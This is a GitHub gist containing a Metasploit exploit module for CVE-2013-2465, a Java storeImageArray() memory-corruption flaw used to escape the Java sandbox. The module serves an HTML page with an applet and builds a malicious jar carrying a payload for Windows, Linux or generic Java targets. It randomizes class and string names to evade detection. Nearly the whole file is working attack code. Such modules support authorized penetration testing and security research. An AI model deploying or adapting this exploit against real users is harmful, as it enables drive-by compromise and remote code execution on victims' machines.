Created
November 12, 2013 21:05
-
-
Save jvazquez-r7/7438687 to your computer and use it in GitHub Desktop.
java_storeimagearray
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http//metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
require 'rex' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default | |
include Msf::Exploit::Remote::BrowserExploitServer | |
include Msf::Exploit::Remote::BrowserAutopwn | |
autopwn_info({ :javascript => false }) | |
def initialize( info = {} ) | |
super( update_info( info, | |
'Name' => 'Java storeImageArray() Invalid Array Indexing Vulnerability', | |
'Description' => %q{ | |
This module abuses an Invalid Array Indexing Vulnerability on the | |
static function storeImageArray() function in order to cause a | |
memory corruption and escape the Java Sandbox. The vulnerability | |
affects Java version 7u21 and earlier. The module, which doesn't bypass | |
click2play, has been tested successfully on Java 7u21 on Windows and | |
Linux systems. | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => | |
[ | |
'Unknown', # From PacketStorm | |
'sinn3r', # Metasploit | |
'juan vazquez' # Metasploit | |
], | |
'References' => | |
[ | |
[ 'CVE', '2013-2465' ], | |
[ 'OSVDB', '96269' ], | |
[ 'EDB', '27526' ], | |
[ 'URL', 'http://packetstormsecurity.com/files/122777/' ], | |
[ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ] | |
], | |
'Platform' => %w{ java linux win }, | |
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, | |
'BrowserRequirements' => | |
{ | |
:source => /script|headers/i, | |
:java => /1\.[6-7]/ | |
}, | |
'Targets' => | |
[ | |
[ 'Generic (Java Payload)', | |
{ | |
'Arch' => ARCH_JAVA, | |
'Platform' => 'java' | |
} | |
], | |
[ 'Windows Universal', | |
{ | |
'Arch' => ARCH_X86, | |
'Platform' => 'win', | |
'os_name' => 'Microsoft Windows', | |
'arch' => ARCH_X86 | |
} | |
], | |
[ 'Linux x86', | |
{ | |
'Arch' => ARCH_X86, | |
'Platform' => 'linux', | |
'os_name' => 'Linux', | |
'arch' => ARCH_X86 | |
} | |
] | |
], | |
'DefaultTarget' => 0, | |
'DisclosureDate' => 'Aug 12 2013' | |
)) | |
end | |
def setup | |
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit.class") | |
@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } | |
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class") | |
@color_model_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } | |
path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class") | |
@color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } | |
@exploit_class_name = rand_text_alpha("Exploit".length) | |
@color_model_class_name = rand_text_alpha("MyColorModel".length) | |
@color_space_class_name = rand_text_alpha("MyColorSpace".length) | |
@exploit_class.gsub!("Exploit", @exploit_class_name) | |
@exploit_class.gsub!("MyColorModel", @color_model_class_name) | |
@exploit_class.gsub!("MyColorSpace", @color_space_class_name) | |
@color_model_class.gsub!("Exploit", @exploit_class_name) | |
@color_model_class.gsub!("MyColorModel", @color_model_class_name) | |
@color_model_class.gsub!("MyColorSpace", @color_space_class_name) | |
@color_space_class.gsub!("Exploit", @exploit_class_name) | |
@color_space_class.gsub!("MyColorModel", @color_model_class_name) | |
@color_space_class.gsub!("MyColorSpace", @color_space_class_name) | |
super | |
end | |
def on_request_exploit(cli, request, target_info ) | |
print_debug("Requesting: #{request.uri}") | |
if request.uri !~ /\.jar$/i | |
if not request.uri =~ /\/$/ | |
print_status("Sending redirect...") | |
send_redirect(cli, "#{get_resource}/", '') | |
return | |
end | |
print_status("Sending HTML...") | |
#send_response_html(cli, generate_html, {'Content-Type'=>'text/html'}) | |
send_exploit_html(cli, exploit_template) | |
return | |
end | |
print_status("Sending .jar file...") | |
send_response(cli, generate_jar(cli, target_info), {'Content-Type'=>'application/java-archive'}) | |
end | |
def exploit_template | |
jar_name = rand_text_alpha(5+rand(3)) | |
html_template = %Q|<html> | |
<head> | |
</head> | |
<body> | |
<applet archive="<%=jar_name%>.jar" code="<%=@exploit_class_name%>" width="1000" height="1000"> | |
</applet> | |
</body> | |
</html> | |
| | |
return html_template, binding() | |
end | |
def get_payload(cli, browser_info) | |
arch = browser_info[:arch] | |
platform = browser_info[:os_name] | |
# Fix names for consisntecy so our API can find the right one | |
# Originally defined in lib/msf/core/constants.rb | |
platform = platform.gsub(/^Mac OS X$/, 'OSX') | |
platform = platform.gsub(/^Microsoft Windows$/, 'Windows') | |
regenerate_payload(cli, platform, arch) | |
end | |
def generate_jar(cli, target_info) | |
p = get_payload(cli, target_info) | |
jar = p.encoded_jar | |
jar.add_file("#{@exploit_class_name}.class", @exploit_class) | |
jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class) | |
jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class) | |
metasploit_str = rand_text_alpha("metasploit".length) | |
payload_str = rand_text_alpha("payload".length) | |
jar.entries.each { |entry| | |
entry.name.gsub!("metasploit", metasploit_str) | |
entry.name.gsub!("Payload", payload_str) | |
entry.data = entry.data.gsub("metasploit", metasploit_str) | |
entry.data = entry.data.gsub("Payload", payload_str) | |
} | |
jar.build_manifest | |
return jar.pack | |
end | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment